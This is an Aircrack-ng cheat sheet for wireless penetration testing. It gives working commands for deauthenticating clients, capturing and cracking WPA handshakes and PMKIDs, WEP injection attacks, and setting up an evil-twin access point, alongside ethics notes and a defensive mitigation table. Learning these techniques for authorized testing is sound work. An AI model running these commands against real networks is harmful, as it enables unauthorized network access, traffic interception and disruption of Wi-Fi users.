Introduction
Aircrack-ng is a powerful suite of tools for auditing wireless network security. It includes tools for monitoring, attacking, testing, and cracking Wi-Fi 802.11 networks. This comprehensive cheatsheet provides a detailed reference for security professionals, network administrators, and cybersecurity students performing authorized wireless security assessments. Understanding these tools is essential both for securing your own networks and for identifying vulnerabilities during authorized penetration testing.
Core Concepts of Wireless Security Testing
Wi-Fi Security Protocols
- WEP (Wired Equivalent Privacy): Outdated and vulnerable
- WPA (Wi-Fi Protected Access): Improved security over WEP
- WPA2 (Wi-Fi Protected Access II): Current standard with stronger encryption
- WPA3 (Wi-Fi Protected Access III): Latest standard with enhanced security features
- Enterprise vs. Personal: Different authentication mechanisms (RADIUS server vs. Pre-shared key)
Authentication Methods
- Pre-Shared Key (PSK): Single password shared by all users
- 802.1X/EAP: Enterprise authentication using individual credentials
- SAE (Simultaneous Authentication of Equals): WPA3’s handshake method replacing 4-way handshake
Key Attack Vectors
- Packet Capture & Analysis: Intercepting and examining wireless traffic
- Deauthentication: Forcing clients to disconnect and reconnect
- Handshake Capture: Obtaining encrypted authentication handshakes
- Dictionary Attacks: Testing password lists against captured handshakes
- PMKID Attacks: Targeting the Pairwise Master Key Identifier
- Evil Twin: Creating rogue access points to capture credentials
Aircrack-ng Suite Components
Core Tools and Functions
| Tool | Purpose | Primary Use Cases |
|---|---|---|
| aircrack-ng | WEP/WPA/WPA2-PSK key cracking | Cracking captured handshakes, PTW attacks |
| airmon-ng | Wireless interface management | Setting up monitor mode |
| airodump-ng | Packet capture | Discovering networks, capturing handshakes |
| aireplay-ng | Packet injection | Generating traffic, deauthentication |
| airbase-ng | Fake AP setup | Creating rogue access points |
| airtun-ng | Virtual tunnel interface | Creating encrypted tunnels |
| packetforge-ng | Packet creation | Generating custom wireless frames |
| wesside-ng | Automated WEP cracking | All-in-one WEP recovery |
| easside-ng | Communication capture | Targeted client data capture |
| tkiptun-ng | WPA/TKIP attacks | Testing TKIP implementations |
| besside-ng | Automated WPA cracking | Targeting multiple networks simultaneously |
Supporting Tools
| Tool | Purpose |
|---|---|
| airdecap-ng | Decrypt WEP/WPA/WPA2 capture files |
| airdecloak-ng | Remove WEP cloaking to improve cracking |
| airolib-ng | Store and manage ESSID and password lists |
| airserv-ng | Provide remote access to wireless cards |
| buddy-ng | Helper tool for easside-ng |
| ivstools | Manipulate IVS files |
| kstats | Show statistical FMS attack data |
| makeivs-ng | Generate initialization vectors |
| wpaclean | Clean captured WPA handshake files |
Step-by-Step Wireless Assessment Process
Phase 1: Preparation
- Verify you have proper authorization to test the network
- Set up your testing environment (Kali Linux or similar)
- Confirm compatible wireless adapter with monitor mode & packet injection support
- Prepare wordlists for cracking if performing dictionary attacks
- Document target networks and testing objectives
Phase 2: Interface Setup
Identify wireless interfaces
sudo airmon-ngKill interfering processes
sudo airmon-ng check killSet interface to monitor mode
sudo airmon-ng start wlan0 # Result: monitor interface created (typically wlan0mon)Verify monitor mode
sudo iwconfig
Phase 3: Network Discovery
Scan for wireless networks
sudo airodump-ng wlan0monFocused scan on target network
sudo airodump-ng -c [channel] --bssid [BSSID] -w [file prefix] wlan0monParameters:
-c [channel]: Specific channel to monitor--bssid [BSSID]: Target access point MAC address-w [file prefix]: Prefix for saved capture files
Phase 4: Capture Authentication Data
WPA/WPA2 Handshake Capture:
a. First, run airodump-ng focused on target
sudo airodump-ng -c [channel] --bssid [BSSID] -w [capture file] wlan0monb. In a new terminal, force deauthentication to trigger handshake
sudo aireplay-ng -0 1 -a [BSSID] -c [client MAC] wlan0monParameters:
-0 1: Send 1 deauth packet (increase number for multiple packets)-a [BSSID]: Target access point-c [client MAC]: Target client (optional)
c. Verify handshake capture (look for “WPA handshake: [BSSID]” in airodump-ng)
PMKID Capture (No client needed):
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1 --filterlist=[BSSID] --filtermode=2WEP Data Capture:
sudo airodump-ng -c [channel] --bssid [BSSID] -w [capture file] wlan0mon
Phase 5: Traffic Generation (For WEP)
Fake authentication with the access point
sudo aireplay-ng -1 0 -e [ESSID] -a [BSSID] -h [your MAC] wlan0monARP request replay attack
sudo aireplay-ng -3 -b [BSSID] -h [your MAC] wlan0monFragmentation attack
sudo aireplay-ng -5 -b [BSSID] -h [your MAC] wlan0mon
Phase 6: Cracking Passwords
WPA/WPA2 Handshake Cracking:
sudo aircrack-ng -a2 -b [BSSID] -w [wordlist path] [capture file.cap]Parameters:
-a2: WPA/WPA2 cracking mode-b [BSSID]: Target access point-w [wordlist path]: Path to dictionary file
PMKID Cracking:
a. First, convert captured PMKID
sudo hcxpcapngtool -o pmkid.hashes pmkid.pcapngb. Then crack
sudo hashcat -m 16800 pmkid.hashes [wordlist path]WEP Cracking:
sudo aircrack-ng -b [BSSID] [capture file.cap]Advanced WPA wordlist attack with rules:
sudo aircrack-ng -a2 -b [BSSID] -w [wordlist path] -r [rule file] [capture file.cap]
Phase 7: Post-Exploitation Verification
Decrypt captured packets
sudo airdecap-ng -p [password] -e [ESSID] [capture file.cap]Connect to the network to verify access
Document findings and recommendations
Clean up temporary files
Advanced Techniques & Commands
Targeted BSSID & Client Deauthentication
Deauthenticate all clients from specific AP
sudo aireplay-ng -0 0 -a [BSSID] wlan0monDeauthenticate specific client
sudo aireplay-ng -0 0 -a [BSSID] -c [client MAC] wlan0monDeauthenticate multiple networks using a list
sudo mdk4 wlan0mon d -b blacklist.txt
Evil Twin Attack Setup
Setup fake AP
sudo airbase-ng -e [Target ESSID] -c [channel] wlan0monConfigure routing & DHCP
sudo ifconfig at0 up 192.168.1.1 netmask 255.255.255.0 sudo route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1Setup DHCP server
sudo dnsmasq -C dnsmasq.conf -dEnable routing
sudo echo 1 > /proc/sys/net/ipv4/ip_forward sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
Passive Handshake Collection
sudo airodump-ng -c [channel range] --bssid [BSSID] -w captures wlan0mon
Advanced WEP Cracking
Korek ChopChop attack
sudo aireplay-ng -4 -b [BSSID] -h [your MAC] wlan0monCaffe Latte attack (client-side WEP)
sudo aireplay-ng -6 -b [BSSID] -h [your MAC] wlan0monHirte attack (client-side WEP)
sudo aireplay-ng -7 -b [BSSID] -h [your MAC] wlan0mon
Common Challenges & Solutions
Hardware Issues
| Issue | Solution |
|---|---|
| Monitor mode not working | Check driver compatibility, try different kernel |
| Packet injection failing | Run sudo aireplay-ng -9 wlan0mon to test |
| Weak signal | Use directional antenna, adjust positioning |
| USB adapter disconnects | Use powered USB hub, check overheating |
Software/Attack Issues
| Issue | Solution |
|---|---|
| No handshake captured | Try targeted deauth with visible clients, wait longer |
| WPA handshake not verified | Check for “WPA handshake” message in airodump-ng |
| Slow cracking performance | Use GPU acceleration, optimize wordlist |
| Crowded Wi-Fi channels | Target networks on less congested channels |
Best Practices for Wi-Fi Security Assessment
Testing Ethics & Legal Considerations
- Always obtain explicit permission before testing
- Document scope and authorization in writing
- Avoid disrupting production networks
- Protect captured data according to client’s security policies
- Stay within defined scope boundaries
Efficient Password Cracking
- Start with targeted wordlists relevant to the organization
- Use rule-based attacks for common password patterns
- Implement mask attacks for known password policies
- Utilize GPU acceleration when available
- Consider distributed cracking for complex passwords
Documentation & Reporting
- Capture detailed evidence of vulnerabilities
- Document each step of the assessment process
- Include actionable recommendations for remediation
- Classify findings by severity and impact
- Provide executive summary for non-technical stakeholders
Attack Mitigation Techniques
| Attack Method | Recommended Defense |
|---|---|
| WEP Cracking | Upgrade to WPA2/WPA3 |
| Handshake Capture | Use strong, complex passwords (12+ chars) |
| Evil Twin | Implement 802.1X with server certificate validation |
| Deauthentication | Enable Protected Management Frames (PMF) |
| Dictionary Attacks | Enforce strong password policy |
| PMKID Attacks | Use WPA Enterprise or WPA3 |
Comparison of Wi-Fi Security Standards
| Feature | WEP | WPA | WPA2 | WPA3 |
|---|---|---|---|---|
| Encryption | RC4 (weak) | TKIP/RC4 | CCMP/AES | GCMP-256 |
| Key Length | 64/128-bit | 128-bit | 128-bit | 192-bit |
| Vulnerability to Aircrack-ng | Highly vulnerable | Moderately vulnerable | Vulnerable with weak password | Resistant to basic attacks |
| Authentication | Shared Key | PSK or 802.1X | PSK or 802.1X | SAE or 802.1X |
| Common Attack Vectors | IV collisions, statistical | TKIP MIC attacks, Dictionary | Dictionary, PMKID | Side-channel attacks |
| Aircrack-ng Attack Time | Minutes | Hours to Days | Hours to Days | Days to Impractical |
Resources for Further Learning
Official Documentation
Books & Publications
- “Penetration Testing: A Hands-On Introduction to Hacking”
- “Kali Linux Wireless Penetration Testing Beginner’s Guide”
- “BackTrack 5 Wireless Penetration Testing”
- “Hacking Exposed Wireless”
Online Courses & Training
- Offensive Security Wireless Attacks (WiFu)
- SANS SEC617: Wireless Penetration Testing and Ethical Hacking
- Pentester Academy – WiFi Security and Pentesting
- Udemy and Coursera wireless security courses
Communities & Forums
- Aircrack-ng Forums
- Kali Linux Forums
- HackForums Wireless Security Section
- Reddit r/HowToHack and r/AskNetSec
Quick Tips for Effective Wireless Assessment
- Use high-quality wireless adapters with Atheros or Realtek chipsets
- Test during off-hours to minimize network disruption
- Create a dedicated testing environment separate from production
- Maintain a collection of proven wordlists for different scenarios
- Keep tools and drivers updated for best compatibility
- Use Kali Linux for a comprehensive toolkit pre-installed
- Consider multiple antennas for better coverage in large environments
- Document your methodology for consistent and repeatable testing
- Always clean up captured files containing sensitive information
- Stay updated on new wireless security vulnerabilities and techniques